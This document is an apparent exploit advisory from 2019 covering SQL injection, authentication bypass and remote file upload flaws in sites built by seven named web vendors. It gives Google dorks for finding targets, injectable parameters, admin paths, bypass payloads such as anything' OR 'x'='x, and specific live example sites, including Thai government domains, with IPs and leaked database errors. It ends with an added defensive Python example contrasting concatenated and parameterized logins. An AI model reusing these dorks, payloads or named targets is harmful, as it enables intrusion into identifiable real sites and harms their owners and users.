- ####################################################################
- # Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
- * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
- SQL Injection / Authentication Bypass / Remote File Upload
- ------------------------------------------------------------------------------------------------
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/01/2019
- # Vendor Homepages of Vulnerable Products :
- 1) vinayak.com
- 2) royalways.com
- 3) apurvainfosystems.com - axiscomputech.in
- 4) handsintechnology.com
- 5) wbprd.nic.in
- 6) timesmedia.co.th
- 7) vivadizayn.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- CWE-592 [ Authentication Bypass Issues ]
- ####################################################################
- # There are 6 vendors whose products suffer from remote SQL Injection vulnerabilities.
- ***************************************************************************
- 1) Designed by Vinayak SQL Injection Vulnerability
- 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
- 3) Designed by Apurva Infosystems SQL Injection Vulnerability
- 4) Powered By Hands in Technology India SQL Injection Vulnerability
- 5) Designed & Developed By Computerization Cell
- National Informatics Centre India SQL Injection Vulnerability
- 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
- 7) Design - Technology VivaDizayn SQL Injection Vulnerability
- ####################################################################
- # Google Dorks for Vulnerable Different Products :
- ********************************************
- 1) intext:designed by Vinayak site:in
- 2) intext:Website Design By Royalways
- 3) intext:designed by : Apurva Infosystems
- intext:by Axis Computech & Peripherals Pvt. Ltd.
- 4) intext:Powered By : Hands in Technology site:in
- 5) intext:Designed & Developed By Computerization Cell
- intext:Designed and Developed by : National Informatics Centre
- 6) inurl:''/select_news.php?news_id='' site:go.th
- 7) intext:Design - Technology VivaDizayn
- ####################################################################
- 1) Designed by Vinayak SQL Injection Vulnerability
- ********************************************
- # Google Dork:
- **************
- intext:designed by Vinayak site:in
- # SQL Injection Exploit :
- ***********************
- /campusupdate.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] gnct.co.in/campusupdate.php?id=78%27
- Note => (50.28.79.232) => There are 369 domains hosted on this server.
- Note => (173.236.156.143) => There are 46 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_connect(): Access denied for user 'gniot_cognew
- '@'localhost' (using password: YES) in /home/gnctgro7916
- /gnct.co.in/campusupdate.php on line 42
- ####################################################################
- 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
- **************************************************************************
- # Google Dork:
- **************
- intext:Website Design By Royalways
- # SQL Injection Exploit :
- ***********************
- /new_arrival.php?count=[SQL Injection]
- # Admin Login Path :
- *******************
- /admin/
- # Authentication Bypass Exploit :
- *****************************
- Admin username => '=''or'
- Admin password => '=''or'
- /admin/home.php
- /admin/add_cat.php
- /admin/view_cat.php
- /admin/add_product.php
- /admin/view_products.php
- /admin/add_coupon.php
- /admin/manage_coupons.php
- /admin/orders_status.php?sort=New
- /admin/orders_status.php?sort=Pending
- /admin/orders_status.php?sort=Delivered
- /admin/manage_shipping.php
- /admin/manage_currency.php
- /admin/view_all_users.php
- /admin/chg_pwd.php
- # Example Vulnerable Site :
- *************************
- [+] hnh.in/new_arrival.php?count=1%27
- Note : (198.49.66.2) => There are 81 domains hosted on this server.
- Note : (198.49.66.5) => 1 Domain.
- # SQL Database Error :
- **********************
- Warning: mysql_num_rows() expects parameter 1 to be
- resource, boolean given in /home/hnhin/public_html
- /products_new_arrival.php on line 159
- ####################################################################
- 3) Designed by Apurva Infosystems SQL Injection Vulnerability
- ******************************************************
- # Google Dork :
- **************
- intext:designed by : Apurva Infosystems
- intext:by Axis Computech & Peripherals Pvt. Ltd.
- # SQL Injection Exploit :
- ***********************
- /index.php?id=[SQL Injection]
- /laptops.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] lenovoretail.in/index.php?id=1%27
- Note : (173.254.75.123) => There are 109 domains hosted on this server.
- Note : (208.79.234.118) => There are 90 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_query(): Access denied for user
- ''@'localhost' (using password: NO) in /home
- /lenovoretail/public_html/index.php on line 59
- ####################################################################
- 4) Powered By Hands in Technology SQL Injection Vulnerability
- *******************************************************
- # Google Dork:
- **************
- intext:Powered By : Hands in Technology site:in
- # SQL Injection Exploit :
- ***********************
- /our-campaigns.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] struggleforjustice.in/our-campaigns.php?id=93%27
- Note : (108.167.158.159) => There are 58 domains hosted on this server.
- Note : (166.62.27.182) => There are 1,024 domains hosted on this server.
- # SQL Database Error :
- **********************
- Deprecated: mysql_query(): The mysql extension is deprecated
- and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
- /public_html/struggleforjustice.in/our-campaigns.php on line 74
- ####################################################################
- 5) Designed & Developed By Computerization Cell
- National Informatics Centre India SQL Injection Vulnerability
- ******************************************************
- # Google Dork:
- **************
- intext:Designed & Developed By Computerization Cell
- intext:Designed and Developed by : National Informatics Centre
- # SQL Injection Exploit :
- ***********************
- /monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27
- Note : (164.100.178.145) => 2 Domains.
- Note : (202.61.117.157) => 1 Domain.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_array(): supplied argument is not a valid
- MySQL result resource in D:\xampp\htdocs\gpmsstatus
- \monthlyReport\cfcpgmonthlyreport.php on line 287
- ####################################################################
- 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
- ****************************************************************
- # Google Dork :
- *****************
- inurl:''/select_news.php?news_id='' site:go.th
- # CopyRight © 2015 www.timesmedia.co.th All Rights Reserved
- # Note : Thailand Government WebSites are vulnerable.
- # Admin Control Panel Login Path :
- *******************************
- /login_form.php
- /admin.php
- # SQL Injection Exploits :
- ***********************
- /contact.php?content_id=[SQL Injection]
- /base.php?content_id=[SQL Injection]
- /council.php?content_id=[SQL Injection]
- /history.php?content_id=[SQL Injection]
- /person.php?content_id=[SQL Injection]
- /vision.php?content_id=[SQL Injection]
- /memorable.php?content_id=[SQL Injection]
- /travel.php?content_id=[SQL Injection]
- /stucture.php?content_id=[SQL Injection]
- /admin1.php?content_id=[SQL Injection]
- /otop.php?content_id=[SQL Injection]
- /news.php?id_type=[SQL Injection]
- /select_news.php?news_id=[SQL Injection]
- /policy.php?content_id=[SQL Injection]
- /office.php?content_id=[SQL Injection]
- /data.php?content_id=[SQL Injection]
- /strategy_plan.php?content_id=[SQL Injection]
- /activity/user_select_photo.php?news_id=[SQL Injection]
- /vdo/user_select_youtube.php?yt_id=[SQL Injection]
- Unauthorized Topic Add without Administrator Permission Exploit =>
- ***********************************************************
- TARGET/webboard/new.php?category=webboard
- TARGET/webboard/index.php?category=webboard
- Note : Use Mozilla Firefox Open Link No Redirect
- Extension to Bypass Admin Control Panel
- Download and Install on your Browser =>
- addons.mozilla.org/en-US/firefox/addon/noredirect/
- addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/
- If that does not work, try one of the SQL authentication exploit payloads below =>
- *******************************************************************
- Admin Username : anything' OR 'x'='x
- Admin Password : anything' OR 'x'='x
- Directory File Path : /fileupload/....
- Directory File Path : /activity/images/....
- Remote File Upload Exploit =>
- ****************************
- TARGET/admin/FCKeditor/editor/filemanager/upload/test.html
- /UserFiles/....
- Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.
- # Example Vulnerable Sites :
- **************************
- => Vulnerable IP Address => 61.19.250.25 =>
- There are 52 domains hosted on this server.
- Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php
- [+] banthan.go.th/policy.php?content_id=1%27 =>
- [ Proof of Concept for SQL Inj ] => archive.is/lkrrB
- [+] makluakao.go.th/webboard/index.php?category=webboard =>
- [ Proof of Concept ] => archive.is/azGk4
- [+] phoklang.go.th/news.php?id_type=4%27 =>
- [ Proof of Concept for RFU Vuln ] => archive.is/8wk57
- # SQL Database Error :
- *********************
- Warning: mysql_fetch_array() expects parameter 1 to be
- resource, boolean given in /home/phoklang/
- domains/phoklang.go.th/public_html/news.php on line 129
- ####################################################################
- 7) Design - Technology VivaDizayn SQL Injection Vulnerability
- *****************************************************
- # Google Dork:
- **************
- intext:Design - Technology VivaDizayn
- # SQL Injection Exploit :
- **********************
- /en/detay.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] rovelsan.com.tr/en/detay.php?id=696%27
- Note : (185.67.122.66) => There are 210 domains hosted on this server.
- # SQL Database Error :
- *********************
- Warning: mysql_fetch_array(): supplied argument is not a valid
- MySQL result resource in /home/rovelsant/domains
- /rovelsan.com.tr/public_html/en/detay.php on line 20
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
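
The authentication-bypass strings listed above only work where a login script pastes form input straight into its SQL text. The following is an added example, not code from the advisory or from any vendor it names: it contrasts that pattern with a bound-parameter login, using Python's sqlite3 and a constructed one-row table. The names `make_db`, `derive`, `login_concatenated` and `login_parameterized` are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "anything' OR 'x'='x"  # string quoted in the advisory above


def derive(password, salt):
    """Salted, slow password hash so the fixed login never compares plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db():
    """Constructed sample data: a single admin account in an in-memory database."""
    salt = os.urandom(16)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin "
               "(username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    db.execute("INSERT INTO admin VALUES (?, ?, ?, ?)",
               ("siteadmin", "s3cret-pass", salt, derive("s3cret-pass", salt)))
    return db


def login_concatenated(db, user, password):
    """Legacy pattern: input becomes part of the SQL text, so quotes rewrite it."""
    sql = ("SELECT username FROM admin WHERE username='" + user +
           "' AND password='" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # An unbalanced quote (the id=1%27 style probe) breaks the statement;
        # legacy sites print this error to the page, as the warnings above show.
        return False


def login_parameterized(db, user, password):
    """Fixed pattern: input is bound as data and the password is checked in code."""
    row = db.execute("SELECT salt, pw_hash FROM admin WHERE username = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(derive(password, row[0]), row[1])


if __name__ == "__main__":
    db = make_db()
    print("concatenated accepts payload: ", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
```

The same binding applies to the numeric `id=` and `content_id=` parameters listed above: with placeholders, a trailing quote is just an unmatched value rather than a syntax error.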